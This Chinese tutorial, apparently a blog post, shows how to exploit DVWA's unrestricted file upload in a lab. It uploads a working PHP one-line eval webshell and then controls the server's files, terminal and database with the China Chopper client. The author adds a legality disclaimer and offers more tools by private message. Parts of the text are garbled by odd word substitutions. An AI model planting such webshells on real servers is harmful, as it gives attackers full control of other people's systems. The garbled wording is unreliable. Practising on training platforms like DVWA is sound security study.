文章目录
[+]
环境:
虚拟机、Windows2008(其他系统也可以);
Dvwa平台;
(图片来自网络侵删)
中国菜刀;
一句话木马;
废话不多说,直接上刺刀。
首先我们登录dvwa平台,找到文件上传的界面,在这里我们可以上传任何文件,由于他源代码没有任何格式限定,以是我们上传木马也是许可的。
首先准备一句话木马:
<?php eval($_POST[123456]);?> //这时一段一句话木马,\"大众123456\"大众是连接密码,等会会用到。
格式保存为.php ,我这里的名字是hacker.php
将hacker.php(一句话木马)上传到我们攻击的网页中,他会帮我们保存到做事器端。
点一下Upload上传:
这时我们可以看到一句话木马已经上传成功:../../hackable/uploads/hacker.php succesfully uploaded!
赤色字是一句话木马的路径:192.168.1.104/dvwa/hackable/uploads/hacker.php
木马已经上传,我们可以直接用菜刀连接此连接。
打开菜刀,右击空缺\公众添加\公众,把连接输入进去,后面小方框是填你脚本的密码,一定要填,不然连接不上,我这里是\"大众123456\公众,末了添加就可以了
末了右击添加的连接,点击文件管理
直接就连接到我们攻击的做事器上,在上面可以删除、修正,实行任何权限。
在这上面不仅可以文件管理、还支持终端、数据库连接,都可以实现,可以说功能很强大
本日教程就完了,我这里也有很多工具和脚本,大家须要的都可以私聊我。
但是我们学习是为了剖析漏洞,并不是一味的攻击别人,在任何未经授权的情形下攻击别人网站都是犯法的。
大家帮忙点点关注,关注一下也不要钱,感激您勒!
